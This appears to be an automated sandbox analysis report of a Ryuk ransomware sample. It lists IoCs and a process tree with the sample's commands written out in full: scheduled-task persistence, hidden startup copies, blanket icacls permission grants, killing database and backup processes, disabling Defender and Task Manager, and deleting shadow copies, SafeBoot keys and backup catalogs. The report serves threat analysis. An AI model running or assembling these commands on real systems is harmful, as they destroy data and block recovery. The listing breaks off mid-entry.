1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exeWMIC.exevssvc.exetaskkill.exetaskkill.exetaskkill.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

description	pid	process
Token: SeDebugPrivilege	4380	taskkill.exe
Token: SeDebugPrivilege	1688	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1772	WMIC.exe
Token: SeSecurityPrivilege	1772	WMIC.exe
Token: SeTakeOwnershipPrivilege	1772	WMIC.exe
Token: SeLoadDriverPrivilege	1772	WMIC.exe
Token: SeSystemProfilePrivilege	1772	WMIC.exe
Token: SeSystemtimePrivilege	1772	WMIC.exe
Token: SeProfSingleProcessPrivilege	1772	WMIC.exe
Token: SeIncBasePriorityPrivilege	1772	WMIC.exe
Token: SeCreatePagefilePrivilege	1772	WMIC.exe
Token: SeBackupPrivilege	1772	WMIC.exe
Token: SeRestorePrivilege	1772	WMIC.exe
Token: SeShutdownPrivilege	1772	WMIC.exe
Token: SeDebugPrivilege	1772	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1772	WMIC.exe
Token: SeRemoteShutdownPrivilege	1772	WMIC.exe
Token: SeUndockPrivilege	1772	WMIC.exe
Token: SeManageVolumePrivilege	1772	WMIC.exe
Token: 33	1772	WMIC.exe
Token: 34	1772	WMIC.exe
Token: 35	1772	WMIC.exe
Token: 36	1772	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1772	WMIC.exe
Token: SeSecurityPrivilege	1772	WMIC.exe
Token: SeTakeOwnershipPrivilege	1772	WMIC.exe
Token: SeLoadDriverPrivilege	1772	WMIC.exe
Token: SeSystemProfilePrivilege	1772	WMIC.exe
Token: SeSystemtimePrivilege	1772	WMIC.exe
Token: SeProfSingleProcessPrivilege	1772	WMIC.exe
Token: SeIncBasePriorityPrivilege	1772	WMIC.exe
Token: SeCreatePagefilePrivilege	1772	WMIC.exe
Token: SeBackupPrivilege	1772	WMIC.exe
Token: SeRestorePrivilege	1772	WMIC.exe
Token: SeShutdownPrivilege	1772	WMIC.exe
Token: SeDebugPrivilege	1772	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1772	WMIC.exe
Token: SeRemoteShutdownPrivilege	1772	WMIC.exe
Token: SeUndockPrivilege	1772	WMIC.exe
Token: SeManageVolumePrivilege	1772	WMIC.exe
Token: 33	1772	WMIC.exe
Token: 34	1772	WMIC.exe
Token: 35	1772	WMIC.exe
Token: 36	1772	WMIC.exe
Token: SeBackupPrivilege	1616	vssvc.exe
Token: SeRestorePrivilege	1616	vssvc.exe
Token: SeAuditPrivilege	1616	vssvc.exe
Token: SeDebugPrivilege	4092	taskkill.exe
Token: SeDebugPrivilege	4888	taskkill.exe
Token: SeDebugPrivilege	1032	taskkill.exe
Token: SeSecurityPrivilege	1172	wevtutil.exe
Token: SeBackupPrivilege	1172	wevtutil.exe
Token: SeSecurityPrivilege	3568	wevtutil.exe
Token: SeBackupPrivilege	3568	wevtutil.exe
Token: SeSecurityPrivilege	4100	wevtutil.exe
Token: SeBackupPrivilege	4100	wevtutil.exe
Token: SeSecurityPrivilege	3204	wevtutil.exe
Token: SeBackupPrivilege	3204	wevtutil.exe
Token: SeSecurityPrivilege	1104	wevtutil.exe
Token: SeBackupPrivilege	1104	wevtutil.exe
Token: SeSecurityPrivilege	3036	wevtutil.exe
Token: SeBackupPrivilege	3036	wevtutil.exe
Token: SeSecurityPrivilege	1764	wevtutil.exe
Token: SeBackupPrivilege	1764	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1976 wrote to memory of 4844	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1976 wrote to memory of 4844	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 4844 wrote to memory of 4808	4844	cmd.exe	schtasks.exe
PID 4844 wrote to memory of 4808	4844	cmd.exe	schtasks.exe
PID 1976 wrote to memory of 4768	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1976 wrote to memory of 4768	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1976 wrote to memory of 668	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1976 wrote to memory of 668	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1976 wrote to memory of 4256	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1976 wrote to memory of 4256	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 4256 wrote to memory of 920	4256	cmd.exe	schtasks.exe
PID 4256 wrote to memory of 920	4256	cmd.exe	schtasks.exe
PID 1976 wrote to memory of 3528	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1976 wrote to memory of 3528	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 3528 wrote to memory of 1812	3528	cmd.exe	attrib.exe
PID 3528 wrote to memory of 1812	3528	cmd.exe	attrib.exe
PID 1976 wrote to memory of 4252	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1976 wrote to memory of 4252	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 4252 wrote to memory of 4560	4252	cmd.exe	schtasks.exe
PID 4252 wrote to memory of 4560	4252	cmd.exe	schtasks.exe
PID 1976 wrote to memory of 4484	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1976 wrote to memory of 4484	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 4484 wrote to memory of 1176	4484	cmd.exe	schtasks.exe
PID 4484 wrote to memory of 1176	4484	cmd.exe	schtasks.exe
PID 1976 wrote to memory of 3012	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1976 wrote to memory of 3012	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 3012 wrote to memory of 5100	3012	cmd.exe	attrib.exe
PID 3012 wrote to memory of 5100	3012	cmd.exe	attrib.exe
PID 1976 wrote to memory of 4564	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1976 wrote to memory of 4564	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 4564 wrote to memory of 2244	4564	cmd.exe	attrib.exe
PID 4564 wrote to memory of 2244	4564	cmd.exe	attrib.exe
PID 1976 wrote to memory of 844	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1976 wrote to memory of 844	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1976 wrote to memory of 4188	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1976 wrote to memory of 4188	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 844 wrote to memory of 3512	844	cmd.exe	cmd.exe
PID 844 wrote to memory of 3512	844	cmd.exe	cmd.exe
PID 4188 wrote to memory of 1772	4188	cmd.exe	reg.exe
PID 4188 wrote to memory of 1772	4188	cmd.exe	reg.exe
PID 1976 wrote to memory of 4392	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1976 wrote to memory of 4392	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1976 wrote to memory of 3392	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1976 wrote to memory of 3392	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 4392 wrote to memory of 3896	4392	cmd.exe	cmd.exe
PID 4392 wrote to memory of 3896	4392	cmd.exe	cmd.exe
PID 4392 wrote to memory of 4380	4392	cmd.exe	taskkill.exe
PID 4392 wrote to memory of 4380	4392	cmd.exe	taskkill.exe
PID 1976 wrote to memory of 4524	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1976 wrote to memory of 4524	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1976 wrote to memory of 960	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1976 wrote to memory of 960	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 3512 wrote to memory of 212	3512	cmd.exe	icacls.exe
PID 3512 wrote to memory of 212	3512	cmd.exe	icacls.exe
PID 1976 wrote to memory of 2440	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1976 wrote to memory of 2440	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 3896 wrote to memory of 1688	3896	cmd.exe	taskkill.exe
PID 3896 wrote to memory of 1688	3896	cmd.exe	taskkill.exe
PID 1976 wrote to memory of 2800	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1976 wrote to memory of 2800	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1976 wrote to memory of 732	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 1976 wrote to memory of 732	1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe	cmd.exe
PID 732 wrote to memory of 4800	732	cmd.exe	reg.exe
PID 732 wrote to memory of 4800	732	cmd.exe	reg.exe

Views/modifies file attributes 1 TTPs 5 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

1812 attrib.exe
5100 attrib.exe
2244 attrib.exe
2716 attrib.exe
4332 attrib.exe

pid	process
1812	attrib.exe
5100	attrib.exe
2244	attrib.exe
2716	attrib.exe
4332	attrib.exe

C:\Users\Admin\AppData\Local\Temp\f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
"C:\Users\Admin\AppData\Local\Temp\f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe"
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:4844

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:4808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
- Drops startup file
PID:4768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
PID:668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
2⤵
- Suspicious use of WriteProcessMemory
PID:4256

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
3⤵
- Creates scheduled task(s)
PID:920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:3528

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
3⤵
- Drops startup file
- Views/modifies file attributes
PID:1812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe" /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:4252

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe" /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:4560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe" /F
2⤵
- Suspicious use of WriteProcessMemory
PID:4484

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe" /F
3⤵
- Creates scheduled task(s)
PID:1176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:3012

C:\Windows\system32\attrib.exe
attrib +h +s ryuk.exe
3⤵
- Views/modifies file attributes
PID:5100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:4564

C:\Windows\system32\attrib.exe
attrib +h +s C:\ProgramData\ryuk.exe
3⤵
- Views/modifies file attributes
PID:2244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:4188

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
3⤵
PID:1772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
2⤵
- Suspicious use of WriteProcessMemory
PID:844

C:\Windows\system32\cmd.exe
cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
3⤵
- Suspicious use of WriteProcessMemory
PID:3512

C:\Windows\system32\icacls.exe
icacls * /grant Everyone:(OI)(CI)F /T /C /Q
4⤵
- Modifies file permissions
PID:212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
2⤵
- Suspicious use of WriteProcessMemory
PID:4392

C:\Windows\system32\cmd.exe
cmd.exe /c taskkill /t /f /im sql*
3⤵
- Suspicious use of WriteProcessMemory
PID:3896

C:\Windows\system32\taskkill.exe
taskkill /t /f /im sql*
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1688

C:\Windows\system32\taskkill.exe
taskkill /f /t /im veeam*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
2⤵
PID:3392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
2⤵
PID:4524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
2⤵
PID:960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
2⤵
PID:2440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
2⤵
PID:2800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:732

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
PID:4800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:3972

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
3⤵
PID:2308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:4964

C:\Windows\system32\reg.exe
reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:1288

C:\Windows\system32\reg.exe
reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:3756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit
2⤵
PID:1172

C:\Windows\system32\cmd.exe
cmd.exe /c "C:\ProgramData\RyukReadMe.txt "
3⤵
- Checks computer location settings
- Modifies registry class
PID:5072

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt
4⤵
- Opens file in notepad (likely ransom note)
PID:1556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet
2⤵
PID:2732

C:\Windows\system32\cmd.exe
cmd.exe /c vssadmin Delete Shadows /All /Quiet
3⤵
PID:364

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /All /Quiet
4⤵
- Interacts with shadow copies
PID:1412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete
2⤵
PID:3216

C:\Windows\system32\cmd.exe
cmd.exe /c wmic shadowcopy delete
3⤵
PID:3112

C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
2⤵
PID:4320

C:\Windows\system32\cmd.exe
cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
3⤵
PID:1068

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} boostatuspolicy ignoreallfailures
4⤵
- Modifies boot configuration data using bcdedit
PID:640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no
2⤵
PID:4288

C:\Windows\system32\cmd.exe
cmd.exe /c bcdedit /set {default} recoveryenabled no
3⤵
PID:2088

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
4⤵
- Modifies boot configuration data using bcdedit
PID:1836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/
2⤵
PID:3892

C:\Windows\system32\cmd.exe
cmd.exe /c wbadmin delete catalog -quiet/
3⤵
PID:100

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet/
4⤵
- Deletes backup catalog
- Drops file in Windows directory
PID:2024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop avpsus /y
2⤵
PID:1656

C:\Windows\system32\net.exe
net stop avpsus /y
3⤵
PID:4324

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
4⤵
PID:984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y
2⤵
PID:2288

C:\Windows\system32\net.exe
net stop McAfeeDLPAgentService /y
3⤵
PID:2256

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
4⤵
PID:3436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop mfewc /y
2⤵
PID:3368

C:\Windows\system32\net.exe
net stop mfewc /y
3⤵
PID:4008

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
4⤵
PID:4744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y
2⤵
PID:4940

C:\Windows\system32\net.exe
net stop BMR Boot Service /y
3⤵
PID:3916

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
4⤵
PID:444

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y
2⤵
PID:5024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled
2⤵
PID:3912

C:\Windows\system32\sc.exe
sc config SQLTELEMETRY start=disabled
3⤵
- Launches sc.exe
PID:4776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:5092

C:\Windows\system32\sc.exe
sc config SQLTELEMETRY$ECWDB2 start= disabled
3⤵
- Launches sc.exe
PID:4204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled
2⤵
PID:4872

C:\Windows\system32\sc.exe
sc config SQLWriter start= disabled
3⤵
- Launches sc.exe
PID:5020

C:\Windows\system32\cmd.exe
